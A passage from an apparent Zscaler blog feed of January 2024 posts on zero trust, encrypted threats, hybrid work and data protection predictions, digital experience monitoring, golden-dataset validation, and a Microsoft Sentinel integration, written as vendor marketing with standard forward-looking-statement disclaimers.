user-to-app and app-to-app connectivity make it substantially easier to segment application traffic to highly granular sets of users — eliminating lateral movement risk that is often the norm in traditional, flat networks. Meanwhile, a single policy set vastly simplifies the administrative process for enterprises. This is in contrast to application and network firewalls — themselves frequent targets of cyber attacks — which in practice translate to greater performance degradation, complexity, and cost at scale, while failing to achieve enterprise goals of 100% SSL/TLS inspection. In other words, stopping encrypted threats begins and ends with zero trust. 2. Minimize the enterprise attack surface All IP addresses, or internet-facing assets, are discoverable and vulnerable to threat actors — including enterprise applications and tools like VPNs and firewalls. Compromising these assets is the first step for cybercriminals to gain a foothold and move laterally across traditional networks to your valuable crown-jewel applications. Using a zero trust architecture, enterprises can hide these applications from the internet — placing them behind a cloud proxy so that they are only accessible to authenticated users who are authorized by business access policy. This simple fact empowers enterprises to immediately remove vast swaths of the external attack surface, prevent discovery by threat actors, and stop many encrypted attacks from ever happening in the first place. 3. Prevent initial compromise with inline threat prevention Enterprises have numerous tools at their disposal to stop encrypted threats, and here, a layered defense is the best one. Critically, these defenses should be inline — in the data path — so that security tools detect malicious payloads before delivery, rather than pass-through, out-of-band approaches as with many traditional technologies. There are a number of core technologies that should make up a best-practice defense. These include an inline sandbox with ML capabilities; in contrast, many traditional sandboxes assume patient-zero risk, an ML-driven sandbox at cloud scale allows companies to quarantine, block, and detonate suspicious files and zero-day threats immediately, in real time, without impacting business. Furthermore, technologies like cloud IPS, URL filtering, DNS filtering, and browser isolation — turning risky web content into a safe stream of pixels — combine to deliver enterprises what we would term advanced threat protection. While encrypted threats can pass by unnoticed by many enterprises, this type of layered, inline defense ensures that they won’t. 4. Stop data loss Stopping encrypted attacks doesn’t end with threat prevention; enterprises must also secure their data in motion to prevent cybercriminals from exfiltrating it. As mentioned, threat actors frequently use legitimate, trusted SaaS storage providers — and therefore “trusted” encrypted channels —to host malicious payloads and exfiltrated data. Without scanning their outbound SSL/TLS traffic and content inline, enterprises have little way to know this is happening. As with threat prevention, enterprises should also take a multi-layered approach to securing their data. As best practices, enterprises should look for functionality like inline DLP, which inspects SSL/TLS content across all data channels, like SaaS apps, endpoints, email, private apps, and even cloud posture. As a note, in addition to exact data match (EDM), Zscaler has taken an AI-driven approach to automatically discover and classify data across the enterprise, and these categories are used to inform DLP policy. Finally, CASB provides another critical layer of security, protecting inline data in motion and out-of-band data at rest. Diving deeper into encrypted attacks Of course, these best practices are the tip of the iceberg, when it comes to understanding and defending against the full range of encrypted attacks. For a deeper analysis of how enterprises can stop encrypted threats, as well as discover key trends in this dynamic landscape, be sure to register for our upcoming January 18th live webinar with CISO Deepen Desai. Moreover, to uncover our full findings, get your copy of the ThreatLabz 2023 State of Encrypted Attacks Report today. Fri, 12 Jan 2024 15:07:03 -0800 Will Seaton Hybrid Work and Zero Trust: Predictions for 2024 2023 was dubbed “the year of efficiency”. It saw many organizations work towards operational efficiencies in an effort to become nimbler. “More with less” was the mantra spoken by several C-level execs as they tightened their security posture while driving higher productivity. Moving into 2024, the proliferation of generative AI is expected to rapidly accelerate innovation, address inefficiencies, and boost productivity across the board. Such a focus on productivity has also kept the conversation around work-from-anywhere alive and well. From a productivity perspective, hybrid work continues to be the benchmark, allowing flexibility to hire talent from anywhere. Executives are finding the right balance between fully remote, in-office, and hybrid employees to maximize business efficiency. Irrespective of what every organization chooses to do going forward, finding the right balance between access and security is key for increasing and maintaining productivity. We at Zscaler have put together a list of the top predictions for 2024 when it comes to hybrid work trends: Return to office will peak Over the last few years, one question has echoed in everyone’s minds: What will the new workplace look like? 2023 saw many organizations test a hybrid work model, shifting away from a fully remote workforce. This trend is set to continue in 2024, with more and more companies fully embracing hybrid work, increasing the number of days to work from the office and collaborate. The KPMG CEO Outlook Survey found that 64% of leaders globally predict a full return to in-office work by 2026. Further research shows that in the US, 90% of companies intend to implement their return-to-office plans by the end of 2024, according to a report from Resume Builder. These trends will also see IT and security teams reaching for solutions that can support them while maintaining business growth Third party access requirements will grow With productivity and efficiency on the agenda for 2024, teams are extending their reach and skill sets beyond what’s available within the capacity of their full time employees. Namely, they’re hiring contractors to aid them in creating positive business outcomes. To do so, they need to adapt to working with remote contractors and have the tools and infrastructure in place to successfully manage staff along with the right level of security. Last year, a Linkedin study showed a higher growth in contract workers compared to full-time employees. This trend will continue into 2024 as organizations brace themselves for sudden changes in the market as well as their own bottom lines. These third-party users—contractors, vendors, or suppliers—will demand better access to business applications in order to be impactful. This level of fast, easy access to work will drive third-party productivity. Cyberattack risk will increase With workforces and applications becoming more dispersed, the attack surface has increased as well. Of course, bad actors have jumped on the opportunity, increasing their overall cyberattack output, including the recent social engineering attack in the entertainment and gaming industry. What’s more, generative AI has seen widespread organizational adoption, which, too, means more potential threat vectors. Bad actors are leveraging GenAI tools on their own time to discover vulnerabilities in critical sectors and add increased personalization to their attacks, resulting in a potential catastrophe for businesses of all industries through unwavering ransom demands. In addition, 2024 will see increased exploitation of legacy VPN and firewall infrastructure. The cost and complexity of maintaining physical devices that support VPNs, as well as patching their vulnerabilities, has left many IT teams in a rut of infrastructure maintenance rather than improvement. As such, IT teams are looking to amp up their security stack through the cloud to avoid and respond to threats. More mergers and acquisitions will take place Despite economic uncertainty and the current wave of geopolitical challenges, the outlook for M&A appears promising, per Nasdaq.The push to consolidate or divest in certain industries has driven M&A in the past year, and this momentum is expected to continue. Organizations will need to find ways to efficiently onboard new employees and give them application access to maximize productivity amid a merger or acquisition. Organizations that have implemented zero trust network access (ZTNA) have seen a 50% reduction in onboarding time for new employees. Additionally, they’re able to provide consistent access policies across both organizations without compromising security. VPNs will continue to lose fans Our 2023 VPN Risk report found that nearly 1 in 2 organizations experienced a VPN-related attack. This has been a strong reason to move away from legacy remote access solutions in favor of something more robust that can scale with the organization’s growth. With 92% of organizations considering, planning, or in the midst of a zero trust implementation in 2023, this trend will continue well into 2024. Reliance on VPNs will be reduced, and ZTNA will continue to gain traction due to its faster time to value. Indeed, a Zscaler customer reported a sub 48-hour implementation of Zscaler Private Access, effectively replacing their VPNs for remote employees. Organizations will adopt zero trust to better mitigate cyberattacks A zero trust architecture challenges threats by ensuring granular access control and multilayered network segmentation, delivering the best protection of organizations’ most critical data and communications. ZTNA is a ransomware deterrent, hiding crown jewel applications from the internet and making them virtually impossible to attack. n Gartner predicts that by 2025, at least 70% of new remote access deployments will be delivered predominantly via ZTNA as opposed to VPN services. Our 2023 VPN Risk Report suggests a continued growth in an understanding of risk by IT and security leaders as they continue their due diligence on effective zero trust solutions to replace legacy technologies Conclusion As workforces and applications become increasingly mobile, cloud security solutions offer the means of keeping them protected, without harming user experience. Amid a dynamic, evolving threat landscape, driven by artificial intelligence, the scale and agility offered through such solutions will help organizations better determine the right deployments for their needs.. Learn more about how you can protect your private apps and secure your hybrid workforce by leveraging Zscaler Private Access. This blog is part of a series of blogs that provide forward-facing statements into access and security in 2024. The next blog in this series covers SASE predictions. Forward-Looking Statements This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024. Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at and on the SEC's website at Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law. Thu, 11 Jan 2024 08:00:01 -0800 Kanishka Pandit Digital Experience Monitoring Predictions for 2024 In 2023, we’ve seen an increase in companies focused on maximizing growth as it relates to productivity and innovation. Employers were looking to optimize employee experiences and reduce costs in hopes of driving increased revenues. According to Great Place To Work, 2023 revenue per employee for Fortune 100 Best Companies increased by 7% YoY, up from 4% from 2022. Revenue per employee increased in 2023 To ensure great employee productivity, companies need secure and fast application and data access from home, hotels, airports, and the office. This is confirmed by Hyatt’s recent earnings where they saw a 2x increase as travel surged, compared to pandemic levels. These trends continue to push IT teams to support employees as they securely access SaaS, public, and private cloud applications, (e.g.,, SAP, Microsoft Office 365, ServiceNow) from anywhere. Globally distributed enterprise is today’s reality However, if organizations continue to leverage legacy network architectures that rely on VPNs and firewalls, they are more susceptible to attacks. These technologies expand an organization's attack surface as they place users directly on a routable network. In a recent VPN risk report, 45% of organizations confirmed experiencing at least one attack that exploited VPN vulnerabilities in the last year. Of those, one in three became victims of VPN-related ransomware attacks. Security does not have to be a tradeoff for fast and reliable access. In a recent post, we analyzed the last 12 months of conversations with hundreds of IT professionals about their employee experience and they reported similar findings; that they lack visibility into Wi-Fi and ISP networks. Their current tools struggle to consolidate device, network, and application details such as system processes, memory, CPU, network latencies, packet loss across network hops, and application response times (DNS, SSL handshake, HTTP/TCP connect). IT must secure and optimize experiences even when networks are out of their control. Businesses continue to rethink their digital transformation journey to ensure a flawless end user experience while securing users, workloads, and devices over any network, anywhere. As both travel and revenue per employee increases, employers are learning how to optimize costs and employee productivity across the board. As we kick off 2024, one thing is clear: understanding how employee experience can impact revenue as a driving force to increasing profits is key. To aid IT teams, organizations need a better path forward, one that is designed with security and optimized end user experience driven by actionable AI. As organizations look forward to 2024, three top digital experience monitoring trends emerge: Zero trust growth will require integrated digital experience monitoring (DEM) AIOps is a requirement, not a “nice to have,” to reduce mean time to resolution Reduce overall IT costs Zero trust growth will require integrated DEM As organizations look to secure their environments leveraging zero trust architectures, they need an integrated digital experience monitoring solution to ensure flawless end user experience no matter where they are located. As we found in our customer conversations, many organizations fail to gain insights into zero trust environments with existing monitoring solutions. They also lack full end-to-end visibility such as last-mile ISP and Wi-Fi insights. Adding to the complexity, managing and correlating data across multiple tools for device, network, and application is time-consuming and frustrating to the end user. Zero trust solutions must include DEM by simplifying deployment through a single agent that combines security and monitoring. Monitoring insights should include device metrics (CPU, memory, disk, network bandwidth), network metrics (hop-by-hop latencies, packet loss, jitter, MOS scores, DNS times), application response times (TCP Connect, SSL handshake, HTTP Connect, TTFB, TTLB times), with intuitive correlation to help service desk and network operations teams AIOps is a requirement, not a “nice to have,” to reduce mean time to resolution (MTTR) As we’ve seen in 2023, generative AI has completely changed the industry, and we’ve seen new applications emerge that create data at exponential rates. We are only scratching the surface of the potential with these apps. Much of this data may not be seen by humans. However, insights from this data could be critical for organizations. Organizations may access thousands of SaaS-based applications to create solutions (e.g., images, text, code) to increase productivity. As these applications become critical for organizations, they must ensure their availability. For example, talking to a manufacturing company, they shared how they leverage generative AI to decrease the time required to produce website content. They take hand-drawn images and upload them into a generative AI solution to create hundreds of images based on different scenarios. This typically takes months, but it now takes minutes and frees up their team to think more strategically. However, to gain efficiency, IT must play many roles regarding the security and availability of these applications. Beyond the guardrails required, IT must ensure employees have access to the tools the business needs, which adds to the cost and complexity. Monitoring these new SaaS applications wherever the user connects will keep employees productive. As organizations look to increase employee productivity, security, network, and service desk, teams must collaborate closely to ensure excellent end user experiences. Providing meaningful insights for all the IT teams requires relevant data. Zero trust monitoring solutions must have machine learning models based on years of data across millions of telemetry points to be effective. As data is collected, these models must adapt and learn based on end user feedback to efficiently identify the root cause of issues. There are three key areas IT teams need to consider: Proactively identify recurring issues before users are impacted. For example, if a certain Wi-Fi router shows repeated issues, network teams can work with service desk teams and end users to proactively replace Wi-Fi routers so end users continue to have great access. Empower service desk teams to either resolve issues or escalate with confidence. For example, if an end user complains about an SAP issue, the service desk team must know a potential root cause in seconds, and route it to the appropriate L3 team. They will need an intuitive AI solution to identify the issue in seconds and share those insights. Drive increased monitoring intelligence with continuous updates to machine learning models. Zero trust monitoring solutions must expand monitoring vantage points and collect new insights to aid IT teams. Reduce overall IT costs As we’ve seen in 2023, macroeconomics are forcing organizations to think about maximizing productivity and profits. In 2023, many organizations have started their journey to zero trust solutions, and are ready to embark on integrating their security and monitoring stacks. In 2024, we’ll see leaders at these organizations ask tough questions around monitoring zero trust environments without adding complexity to their IT architectures. This will set organizations apart, as ones that have the right zero trust architecture will have included monitoring as part of the journey. Not only will it provide better insights for network operations and service desk teams, it will lower overall IT costs. They will be able to retire siloed monitoring solutions to reduce costs and gain better insights. For example, if service desk, desktop, network, and application teams all leveraged the same monitoring solution, they could confidently provide IT leaders with key insights and remove finger pointing, which still occurs as teams hardly look at the same datasets. IT leaders will want a consolidated monitoring stack to answer the following questions: What’s the root cause of Zoom, Teams, and Webex call quality issues and how do I correlate it to the end user’s device, network, and application? We leverage VPNs for private applications and experience application slowness. How do I identify if it’s the device’s CPU or one of the hops in the network? My users blame security for application slowness. How can we quickly verify it’s not? As we saw in 2023, organizations want to leverage existing IT investments where possible. Apart from consolidating their monitoring silos, in 2024, organizations will want to leverage existing ticketing systems. To do so, zero trust monitoring solutions must take AI-powered insights and push them into where service desk and network operations teams live. For example, many organizations have ServiceNow workflows, and smart integrations will provide IT teams with key insights to resolve issues in minutes. Summary As IT teams start planning 2024, it's key to find digital experience monitoring solutions that effectively support the hybrid workforce, leverage AI-assistance, and drive overall IT lower costs. As you embark on your 2024 initiatives, consider Zscaler's Digital Experience monitoring solution. Please don't take our word for it. See what our customers are saying: “15 minutes to resolve user experience issues, down from 8 hours” Jeremy Bauer, Sr. Director Information Security, Molson Coors Beverage Company “Zscaler helps us identify the issues that need to be addressed before they cause disruption to AMN users, so we can ensure a seamless experience from anywhere.” Mani Masood, Head of Information Security, AMN Healthcare “When I open my computer, it doesn't matter if I'm in California, Arizona, Nevada, or across the globe, I get the same experience and the same level of protection.” David Petroski, Senior Infrastructure Architect, Southwest Gas Interested to learn more about ensuring great digital experiences in 2024? Click here for Zscaler’s perspectives. This blog is part of a series of blogs that look ahead to what 2024 will bring for key areas that organizations like yours will face. The next blog in this series covers hybrid work predictions for 2024. Forward-Looking Statements This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024. Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at and on the SEC's website at Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law. Tue, 09 Jan 2024 08:00:01 -0800 Rohit Goyal Data validation on production for unsupervised classification tasks using a golden dataset Abstract Have you ever been working on an unsupervised task and wondered, “How you I validate my algorithm at scale?” In unsupervised learning, in contrast to supervised learning, our validation set has to be manually created and checked by us, i.e. we will have to go through the classifications ourselves and measure the classification accuracy or some other scores. The problem with manual classification is the time, effort, and work that is required for classifications, but this is the easy part of the problem. Let’s assume that we developed an algorithm and tested it very well while manually passing on all the classifications, what about future changes to that algorithm? After every change we should check the classifications manually ourselves again. While the data classified might change with time, it might also grow to huge scales with the evolution of our product, and the growth of our customers, then our manual classification problem would of course be much more difficult. Have you started to worry about your production algorithms already? Well, you shouldn’t! After reading this, you will be familiar with our proposed method to validate your algorithm score easily, adaptively, and effectively against any change in the data or the model. So let's start detailing it from the beginning. Why is it needed? Algorithm continuous modifications always happen. For example, we are having: Runtime optimizations Model improvements Bug fixes Version upgrades How are we dealing with those modifications? We usually use QA tests to make sure the system keeps working. At the same time, the best among us might even develop some regression tests to make sure, for several constant scenarios, that the classifications would not be changed What about data integrity? But what about the real classifications on prod? Who verifies their change? We need to make sure that we won’t have any disasters on prod when deploying our new changes in the algorithm. For that, we have two optional solutions: Naive solution - pass through all the classifications on prod (which is of course not possible) Practical solution - use samples of each customer data on prod - using the margin of error equation. Margin of error To demonstrate, we are going to take a constant sample from each customer’s data, which would represent the real distribution of the data with minimal deviation, which we will do using the Margin of Error equation, sometimes known from election surveys, where the surveys are sometimes based on some equation derived from the Margin of Error equation. So, how does it work? We can use the first equation used for calculating the margin of error, to extract the needed sample size desired. We would like to have a maximum margin of error of 5%, while we should use a constant value of Z = 1.96 if we want the confidence of 95% (might be changed if we would like to have another confidence level) The extraction of the required sample size is demonstrated in the following equation: While this equation is an expansion of the equation above, it might be used when we have the full data size, to be more precise. Otherwise, we’ll be left only with the numerator of that equation - which is also fine if we don’t have the full data size. This is a code block demonstrating the implementation of this equation in Python: We can now freeze those samples, which we call a “golden dataset,” and use them as a supervised dataset that will be used by us in the future when making modifications, and serves us as a data integrity validator on real data from prod. We should mention that because optional changes on prod data might happen with time, we encourage you to update this golden dataset from time to time. The flow of work for end-to-end data integrity: Manual classification to create a golden dataset Maintaining a constant baseline of prod classifications Developing a suite of score comparison tests Integrating quality check into CI-process of the algorithm So, how will it all work together? You can see that in the following GIF: We may now push any change to our algorithm code, and remain protected, thanks to our data integrity shield! For further questions about data integrity checks, or data science in general, don’t hesitate to reach out to me at [email protected]. Fri, 05 Jan 2024 14:41:10 -0800 Eden Meyuhas Data Protection Predictions for 2024 As IT teams reflect on 2023 and look forward to 2024, we can all agree that data is the lifeblood of an organization. To that end, every organization’s goal should be to have visibility and control of data, wherever it’s created, shared, and accessed. New cloud apps, GenAI, remote work, and advanced collaboration approaches are driving a greater need to centralize protection controls and analytics as well as increase efficiency. Without further ado, here are five predictions on how this will come together in 2024. 1. SaaS data gets a new protector While CASB has been a staple of SaaS data protection for quite some time, a new kid on the block is getting popular: SaaS security posture management (SSPM). SSPM comes at the problem of cloud data protection from a different angle. Where CASB focuses on securing collaboration risks attached to data (like sharing data with open links), SSPM focuses on securing the cloud itself. Shared responsibility models put the onus on your organization to ensure your SaaS apps have airtight configuration and integration posture. Since many of the largest breaches have stemmed from cloud misconfigurations, this is a growing concern. SSPM was built to address this very issue. Via API and a shadow IT catalog, SSPM scans your SaaS apps and platforms (e.g., Microsoft 365, Google) and reveals misconfigurations or integrations that put you at risk of a breach. As SSPM begins to show up on radars worldwide, it’s important to not fall into point product land. Adding yet another point product to your environment is how many organizations end up with a frankenstein security stack. As such, security service edge (SSE) becomes a logical final resting place for this core technology. Why? Complete SaaS security needs to be more than just controlling misconfigurations and integrations—you also need to think about SaaS identity (least-privileged access and permissions) and context visibility (who, what, where, and why). SSE excels in both these areas since it is becoming the de facto cloud security stack, which has all this information in spades. Additionally, SSE was built with extensibility for new features in mind. Pairing SSPM with the CASB, DLP, and data protection aspects of SSE delivers a fantastic platform from which to launch your SaaS security efforts. You get a unified approach to all four areas you need for airtight, holistic SaaS security: secure identity, secure data, shadow IT governance, and cloud posture. 2. Managed or unmanaged device? Who cares! In 2024, challenges with unmanaged (BYOD) endpoints used by your employees and partners will start to become a thing of the past. These cast-offs of the IT community have been a thorn in the side of security for some time since, to keep BYOD users productive, you still need to give them access to good stuff—like sensitive data. Since you don’t own or manage BYOD endpoints, you don’t have control over that data once it lands on the device. With managed devices, you have lots of control levers to keep data secure. You can ensure patch level and device posture are up to snuff, or even remotely wipe the machine if need be. Not so much with BYOD. With newer approaches like browser isolation, handling BYOD becomes a snap. Just throw those devices into an isolated browser before you send them off to access all that sensitive data. This way, the data remains in the isolated browser and never lands on the unmanaged device. Data is streamed to the device and appears on the screen, but you can’t cut, paste, print, or download it. Look for vendors who can deliver this game-changing functionality without the need for a software agent, and with easy-to-configure BYOD portals that make getting app access as easy as logging in and clicking on the app of choice. 3. Secure the life cycle, not just the data Another approach to posture that is gaining traction is data security posture management. While SSPM focuses on SaaS apps, DSPM focuses on the life cycle of your data to ensure it always has the right security posture. It’s about who, what, where, and why, much like SSPM in our first prediction. However, in this case, the hero of the story is your data. Why are organizations focusing on this? Pick the most sensitive, crown-jewel piece of information in your organization. Naturally, you’d like to know where it is, where it moves to, who has access to it, if there are risky behaviors attached to it, and guidance on how to close those risks. In essence, you want to protect and follow that data anywhere. DSPM helps you do that, at scale, across all your sensitive data, with in-depth context to make the right protection decisions. The result is a consistent safe data posture that is inherently stronger and more airtight than before. Much like SSPM, look for DSPM to become a core part of SSE. Paired with other key data protection technologies like DLP, CASB, and centralized policy control, DSPM will be an invaluable addition to data protection programs that need to up their game around control of sensitive data. 4. The lines between threat and data protection continue to blur At 2023's Black Hat conference, it was astounding how many people wanted to talk about data protection. For a conference traditionally focused on stopping cyberattacks, this was profound, and it alluded to a shift happening across the industry. After all, it’s true what they say: it’s all about data. Today’s cyberthreats are as much about stealing data as hurting company productivity. Adversaries have realized data is a gold mine, and they will continue to exploit it. So, as security architects think about building out defenses against today’s threats, data protection will become an integral part of the equation. As we blast through 2024, watch out for new data protection offerings that give you more choices on the surface—but that also risk a fragmented approach. The moral of the story is keep your eye on the prize. There’s a reason data protection is part of SSE, one of the fastest-growing security architectures in the last decade. When data protection is centralized in a high-performance inspection cloud with a single agent, things become super streamlined and unified across all channels you need for great protection. Remember that DLP is the core building block of data protection. With a centralized DLP engine, all data across endpoint, network, and at rest in clouds triggers the same way. This leads to a single point of truth for protection, investigations, and incident management, which is what every IT team wants. 5. Every prediction blog will have something about GenAI Our other predictions will have varying hit rates, but this one is 100% guaranteed. No 2024 prediction blog will be complete without GenAI. It’s going to revolutionize the world right before it destroys it, right? Like all new technology crazes, there will be an equilibrium process. Sure, GenAI will enable us to move faster and smarter, but there will be a learning curve around what it does well, and what it doesn’t. Companies will try to integrate it across their business stack to varying degrees of success. But one thing is for sure: data will be headed to GenAI at an alarming rate, so data protection will need to focus on controlling what data goes into GenAI while leveraging GenAI’s power to find risks faster. (I realize I just said, in essence, “using GenAI to catch GenAI leaking data to GenAI,” so apologies for that.) Basically, GenAI is just another productivity tool we need to protect against misuse. Treat GenAI like a shadow IT app. To control it, you need a platform that delivers complete visibility and the proper levers to enable it safely within your organization while ensuring sensitive data doesn’t leak to it. The other half of this is using GenAI to make security smarter. AI will continue to find its way into the ubiquity of computing. We will take for granted its power to help us deliver more powerful correlation, context, analysis, and response times. That’s the relentless pursuit of better security, which is what we’re all about. But let's avoid calling anything in the future “NexGenAI,” because as a marketer, that’s just not cool, man. Putting it all together If you’ve made it this far, you’ve probably picked up on a few themes. Great data protection requires context, integration, posture, and a platform to bring it all together. There’s no telling how far security service edge will take us, but it’s set up for a great year as its architecture expertly enables new features, improves on existing ones, and delivers all-around unified, high-performance data protection. If you’re looking to up your data security game in 2024, we’ve got you covered. Jump on over to read about the Zscaler Data Protection platform or get in touch with us to book a demo. Interested in reading more about Zscaler's predictions in 2024? Read our previous blog in the series about cyber predictions. Forward-Looking Statements This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024. Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at and on the SEC's website at Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law. Thu, 04 Jan 2024 08:00:01 -0800 Steve Grossenbacher AI: Boon or Bane to Security? Security professionals believe offensive AI will outpace defensive AI A recent Cybersecurity Insiders report found that AI is transforming security—making fundamental (and likely permanent) changes to both the attacker and defender toolkits. The “Artificial Intelligence in Cybersecurity” report surveyed 457 cybersecurity professionals online and also tapped into Cybersecurity Insiders’ community of 600,000 information security professionals to find out what CISOs and their frontline teams think about AI’s impact on cybersecurity. The report reveals some sobering findings on what security professionals most fear about AI in the hands of malicious actors. According to the report, 62% of security professionals believe offensive AI will outpace defensive AI. Here’s a breakdown of the report and Zscaler’s take on what to do to combat AI-driven cyberattacks. Source: 2023 Artificial Intelligence in Cybersecurity Report, Cybersecurity Insiders AI increases the sophistication of cyberattacks Unsurprisingly, 71% of respondents believe AI will make cyberattacks significantly more sophisticated, and 66% think these attacks will be more difficult to detect. Source: 2023 Artificial Intelligence in Cybersecurity Report by Cybersecurity Insiders These findings align with observations by the Zscaler ThreatLabz security research team. For instance, the 2023 ThreatLabz Phishing Report noted that AI tools have significantly contributed to the growth of phishing, reducing criminals’ technical barriers to entry while saving them time and resources. Concerningly, the use of AI in phishing campaigns is projected to grow in the coming years. Bracing for AI-enabled ransomware and cyber extortion attacks should be top-of-mind for security practitioners. Think about it: ransomware attacks typically start with social engineering, which 53% of respondents believe will grow more dangerous because of AI. For instance, attackers can use AI voice cloning to impersonate employees to gain privileged access, or use generative AI to help craft convincing phishing emails. Moreover, it will also get easier for attackers to discover and identify zero-day vulnerabilities. Also, the business model of encryption-less extortion—in which threat actors steal data and demand a ransom to avoid a leak, rather than encrypting files—will benefit from advancements in AI-enabled tools that can drastically speed up the development of malicious code, exacerbating the threat to both public and private organizations Organizations plan to increase AI usage in security Zscaler strongly recommends that security practitioners prepare for more coordinated and effective attacks on larger groups of people, as threat actors will leverage AI to launch more sophisticated scams across different communication channels, such as email, SMS, and websites. As the Cybersecurity Insiders survey found, security teams plan to invest more in defensive AI capabilities to do just that. Source: 2023 Artificial Intelligence in Cybersecurity Report by Cybersecurity Insiders In another notable finding, 48% of respondents believe the use of deep learning for detecting malware in encrypted traffic holds the most promise for enhancing cyber defenses. At Zscaler, we have always advocated for inspecting most (if not all) TLS/SSL traffic and applying layered inline security controls. Today, at least 95% of traffic is encrypted (Google Transparency Report), and the Zscaler ThreatLabz 2023 State of Encrypted Attacks report shows that 85.9% of threats are now delivered over encrypted channels, underscoring the need for thorough inspection of all traffic. The Zscaler Zero Trust Exchange inspects HTTPS at scale using a multilayered approach with inline threat inspection, sandboxing, data loss prevention, and a wide array of additional defense capabilities. On top of all that, the AI-powered Zscaler cloud effect means that all threats identified across the global platform trigger automatic updates to protect all Zscaler customers. Strategies for combating AI-powered adversaries Technology has always been a double-edged sword. The age of AI has arrived, and it is just beginning. Accordingly, organizations should prioritize the adoption of AI for cyberthreat protection—so it is gratifying that 74% of respondents say AI is a “medium” to “top” priority for their organization. Additionally, partnering with security vendors who offer superior AI capabilities is crucial. This is easier said than done, as most vendors now claim to leverage AI. The best way forward is to educate yourself, look to vendors with a proven record of technological innovation, and engage them in proofs of concept to assess the efficacy of their solutions for yourself. To find out more about why you need an AI-powered zero trust security platform such as Zscaler’s, watch this on-demand webinar. To read the full “Artificial Intelligence in Cybersecurity'' report by Cybersecurity Insiders, get your complimentary copy here. Mon, 08 Jan 2024 08:00:01 -0800 Apoorva Ravikrishnan Elevating Cybersecurity: Introducing Zscaler and Microsoft Sentinel's New SIEM & SOAR Capabilities The evolution of Security Information and Event Management (SIEM) and Security Orchestration, Automation, and Response (SOAR) technologies has been pivotal in shaping modern cybersecurity strategies. Traditionally, SIEM systems were primarily focused on data aggregation and alert generation, often resulting in an overwhelming number of alerts for security teams to handle. However, as cyberthreats grew more sophisticated, the need for a more proactive and responsive approach became evident. This led to the emergence of SOAR solutions, which complement SIEM by adding layers of automation, orchestration, and advanced response capabilities. Microsoft Sentinel represents the culmination of this evolution. As a cutting-edge SIEM and SOAR solution, Sentinel offers not only comprehensive data collection and analysis but also integrates automated response mechanisms. These advancements allow for quicker, more efficient handling of security incidents, ultimately enhancing the ability of organizations to swiftly adapt and respond to the ever-changing threat landscape. Keeping pace with these advanced features, Zscaler is excited to unveil two new integrations as part of our zero trust collaboration with Microsoft Sentinel. These are: Cloud NSS for ZIA log ingestion into Microsoft Sentinel Zscaler's Cloud NSS, our innovative cloud-to-cloud log streaming service, now makes its way to Microsoft Sentinel, making it faster and easier to deploy, manage, and scale log ingestion from the Zscaler to Microsoft Sentinel Cloud. Fig: Cloud NSS overview This service enables native ingestion of Zscaler’s comprehensive cloud security telemetry into Microsoft Sentinel, enriching investigation and threat hunting for cloud-first organizations without the need to deploy any infrastructure. Key benefits include Reduced complexity: Since Cloud NSS operates in the cloud, it removes the need for additional on-premises hardware or infrastructure. This not only cuts down on physical resource requirements but also 